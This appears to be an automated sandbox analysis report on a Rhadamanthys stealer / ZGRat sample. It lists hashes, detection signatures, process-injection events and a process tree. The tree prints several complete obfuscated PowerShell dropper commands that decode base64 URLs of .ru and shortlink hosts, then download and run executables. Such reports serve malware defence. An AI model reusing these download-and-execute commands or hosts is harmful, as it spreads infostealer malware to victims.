rhadamanthys | 052e54df0b86483f84bbff6504e202c36e7bc25885e369e830dd7086fb7c7562

Analysis

max time kernel
612s
max time network
629s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
20-12-2023 01:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe
Size

210KB
MD5

8e84fa4f3e50e2bdc357c348b923a8b4
SHA1

8ccc6b05df9cd2ab9275e2848a997176b3cd41c8
SHA256

0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1
SHA512

cab0b936c6834068a94d55a7c3172b3b27766ddd41d5422ec2e4b1f2c0f39fa12f1258c4dc5483f061b635976ce398b91d274fbab812b64657ea3eb06e5dc81c
SSDEEP

3072:NWEv+PTBTYm7BsOzKSU2pr1RJoutgYdNC1W:NWEvMlTb7GyrLJoShdNn

Score

10^/10

rhadamanthys zgrat rat stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://bratiop.ru/asdfg.exe

exe.dropper

http://bratiop.ru/asdfg.exe

Signatures

Detect ZGRat V1 30 IoCs

Processes:

resource	yara_rule
behavioral2/memory/244-188-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-190-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-194-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-196-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-198-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-200-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-202-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-204-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-206-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-208-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-210-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-212-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-216-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-218-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-220-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-214-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-222-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-224-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-226-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-228-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-232-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-238-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-244-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-246-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-248-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-242-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-240-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-236-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-234-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1
behavioral2/memory/244-230-0x00000000054A0000-0x0000000005580000-memory.dmp	family_zgrat_v1

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

icw.exe

description pid process target process

PID 4924 created 2664 4924 icw.exe sihost.exe
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

4 3296 powershell.exe
5 544 powershell.exe
6 2080 powershell.exe
7 1952 powershell.exe
8 4004 powershell.exe
Downloads MZ/PE file

description	pid	process	target process
PID 4924 created 2664	4924	icw.exe	sihost.exe

flow	pid	process
4	3296	powershell.exe
5	544	powershell.exe
6	2080	powershell.exe
7	1952	powershell.exe
8	4004	powershell.exe

Executes dropped EXE 13 IoCs

Processes:

patch.exeicw.exeBLduscfibj.exeicw.exeBLduscfibj.exeStringIds.exeStringIds.exeakugwl.exeakugwl.exeSupportsDynamicPartitions.exeSupportsDynamicPartitions.exeSupportsDynamicPartitions.exeSupportsDynamicPartitions.exe

pid	process
2028	patch.exe
3864	icw.exe
3916	BLduscfibj.exe
4924	icw.exe
244	BLduscfibj.exe
2816	StringIds.exe
3948	StringIds.exe
4148	akugwl.exe
1140	akugwl.exe
3804	SupportsDynamicPartitions.exe
2724	SupportsDynamicPartitions.exe
3852	SupportsDynamicPartitions.exe
4244	SupportsDynamicPartitions.exe

UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
upx

Processes:

resource yara_rule

behavioral2/memory/4744-0-0x0000000000400000-0x00000000004A6000-memory.dmp upx
behavioral2/memory/4744-34-0x0000000000400000-0x00000000004A6000-memory.dmp upx

resource	yara_rule
behavioral2/memory/4744-0-0x0000000000400000-0x00000000004A6000-memory.dmp	upx
behavioral2/memory/4744-34-0x0000000000400000-0x00000000004A6000-memory.dmp	upx

Suspicious use of SetThreadContext 11 IoCs

Processes:

icw.exeBLduscfibj.exeStringIds.exeStringIds.exeInstallUtil.exeakugwl.exeSupportsDynamicPartitions.exeSupportsDynamicPartitions.exeaspnet_compiler.exeaspnet_compiler.exeSupportsDynamicPartitions.exe

description	pid	process	target process
PID 3864 set thread context of 4924	3864	icw.exe	icw.exe
PID 3916 set thread context of 244	3916	BLduscfibj.exe	BLduscfibj.exe
PID 2816 set thread context of 3948	2816	StringIds.exe	StringIds.exe
PID 3948 set thread context of 3816	3948	StringIds.exe	InstallUtil.exe
PID 3816 set thread context of 1536	3816	InstallUtil.exe	InstallUtil.exe
PID 4148 set thread context of 1140	4148	akugwl.exe	akugwl.exe
PID 3804 set thread context of 2724	3804	SupportsDynamicPartitions.exe	SupportsDynamicPartitions.exe
PID 2724 set thread context of 2588	2724	SupportsDynamicPartitions.exe	aspnet_compiler.exe
PID 2588 set thread context of 4804	2588	aspnet_compiler.exe	aspnet_compiler.exe
PID 4804 set thread context of 2544	4804	aspnet_compiler.exe	AddInProcess.exe
PID 3852 set thread context of 4244	3852	SupportsDynamicPartitions.exe	SupportsDynamicPartitions.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4384 4924 WerFault.exe icw.exe
3728 4924 WerFault.exe icw.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings cmd.exe

pid	pid_target	process	target process
4384	4924	WerFault.exe	icw.exe
3728	4924	WerFault.exe	icw.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeicw.exedialer.exepowershell.exeStringIds.exepowershell.exepowershell.exeaspnet_compiler.exe

pid	process
3296	powershell.exe
3296	powershell.exe
544	powershell.exe
544	powershell.exe
4400	powershell.exe
4400	powershell.exe
2080	powershell.exe
2080	powershell.exe
4004	powershell.exe
4004	powershell.exe
1952	powershell.exe
1952	powershell.exe
544	powershell.exe
4004	powershell.exe
1952	powershell.exe
2080	powershell.exe
4400	powershell.exe
3296	powershell.exe
4924	icw.exe
4924	icw.exe
1428	dialer.exe
1428	dialer.exe
1428	dialer.exe
1428	dialer.exe
5108	powershell.exe
5108	powershell.exe
3948	StringIds.exe
3948	StringIds.exe
3456	powershell.exe
3456	powershell.exe
2964	powershell.exe
2964	powershell.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe
4804	aspnet_compiler.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

aspnet_compiler.exe

pid process

4804 aspnet_compiler.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

684

pid	process
4804	aspnet_compiler.exe

pid	process
684

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeicw.exeBLduscfibj.exeBLduscfibj.exepowershell.exeStringIds.exeStringIds.exeInstallUtil.exeInstallUtil.exepowershell.exeakugwl.exeakugwl.exepowershell.exeSupportsDynamicPartitions.exeSupportsDynamicPartitions.exeaspnet_compiler.exeaspnet_compiler.exeAddInProcess.exeSupportsDynamicPartitions.exe

description	pid	process
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	544	powershell.exe
Token: SeDebugPrivilege	3864	icw.exe
Token: SeDebugPrivilege	3916	BLduscfibj.exe
Token: SeDebugPrivilege	244	BLduscfibj.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	2816	StringIds.exe
Token: SeDebugPrivilege	3948	StringIds.exe
Token: SeDebugPrivilege	3816	InstallUtil.exe
Token: SeDebugPrivilege	1536	InstallUtil.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	4148	akugwl.exe
Token: SeDebugPrivilege	1140	akugwl.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeDebugPrivilege	3804	SupportsDynamicPartitions.exe
Token: SeDebugPrivilege	2724	SupportsDynamicPartitions.exe
Token: SeDebugPrivilege	2588	aspnet_compiler.exe
Token: SeDebugPrivilege	4804	aspnet_compiler.exe
Token: SeLockMemoryPrivilege	2544	AddInProcess.exe
Token: SeLockMemoryPrivilege	2544	AddInProcess.exe
Token: SeDebugPrivilege	3852	SupportsDynamicPartitions.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AddInProcess.exe

pid process

2544 AddInProcess.exe

pid	process
2544	AddInProcess.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exeicw.exeBLduscfibj.exe

description	pid	process	target process
PID 4744 wrote to memory of 4968	4744	0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe	cmd.exe
PID 4744 wrote to memory of 4968	4744	0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe	cmd.exe
PID 4744 wrote to memory of 4968	4744	0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe	cmd.exe
PID 4968 wrote to memory of 3868	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 3868	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 3868	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 424	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 424	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 424	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 3892	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 3892	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 3892	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 4204	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 4204	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 4204	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 4440	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 4440	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 4440	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 2388	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 2388	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 2388	4968	cmd.exe	mshta.exe
PID 4968 wrote to memory of 2028	4968	cmd.exe	patch.exe
PID 4968 wrote to memory of 2028	4968	cmd.exe	patch.exe
PID 2388 wrote to memory of 4400	2388	mshta.exe	powershell.exe
PID 2388 wrote to memory of 4400	2388	mshta.exe	powershell.exe
PID 2388 wrote to memory of 4400	2388	mshta.exe	powershell.exe
PID 4204 wrote to memory of 1952	4204	mshta.exe	powershell.exe
PID 4204 wrote to memory of 1952	4204	mshta.exe	powershell.exe
PID 4204 wrote to memory of 1952	4204	mshta.exe	powershell.exe
PID 424 wrote to memory of 4004	424	mshta.exe	powershell.exe
PID 424 wrote to memory of 4004	424	mshta.exe	powershell.exe
PID 424 wrote to memory of 4004	424	mshta.exe	powershell.exe
PID 3868 wrote to memory of 3296	3868	mshta.exe	powershell.exe
PID 3868 wrote to memory of 3296	3868	mshta.exe	powershell.exe
PID 3868 wrote to memory of 3296	3868	mshta.exe	powershell.exe
PID 4440 wrote to memory of 2080	4440	mshta.exe	powershell.exe
PID 4440 wrote to memory of 2080	4440	mshta.exe	powershell.exe
PID 4440 wrote to memory of 2080	4440	mshta.exe	powershell.exe
PID 3892 wrote to memory of 544	3892	mshta.exe	powershell.exe
PID 3892 wrote to memory of 544	3892	mshta.exe	powershell.exe
PID 3892 wrote to memory of 544	3892	mshta.exe	powershell.exe
PID 4004 wrote to memory of 3864	4004	powershell.exe	icw.exe
PID 4004 wrote to memory of 3864	4004	powershell.exe	icw.exe
PID 4004 wrote to memory of 3864	4004	powershell.exe	icw.exe
PID 3864 wrote to memory of 3916	3864	icw.exe	BLduscfibj.exe
PID 3864 wrote to memory of 3916	3864	icw.exe	BLduscfibj.exe
PID 3864 wrote to memory of 3916	3864	icw.exe	BLduscfibj.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3864 wrote to memory of 4924	3864	icw.exe	icw.exe
PID 3916 wrote to memory of 244	3916	BLduscfibj.exe	BLduscfibj.exe
PID 3916 wrote to memory of 244	3916	BLduscfibj.exe	BLduscfibj.exe
PID 3916 wrote to memory of 244	3916	BLduscfibj.exe	BLduscfibj.exe
PID 3916 wrote to memory of 244	3916	BLduscfibj.exe	BLduscfibj.exe
PID 3916 wrote to memory of 244	3916	BLduscfibj.exe	BLduscfibj.exe
PID 3916 wrote to memory of 244	3916	BLduscfibj.exe	BLduscfibj.exe
PID 3916 wrote to memory of 244	3916	BLduscfibj.exe	BLduscfibj.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2664

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1428

C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe
"C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D13A.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"
2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3296

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:424

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004

C:\Users\Public\icw.exe
"C:\Users\Public\icw.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3864

C:\Users\Public\icw.exe
C:\Users\Public\icw.exe
6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 448
7⤵
- Program crash
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 500
7⤵
- Program crash
PID:3728

C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916

C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:244

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:4204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:4440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
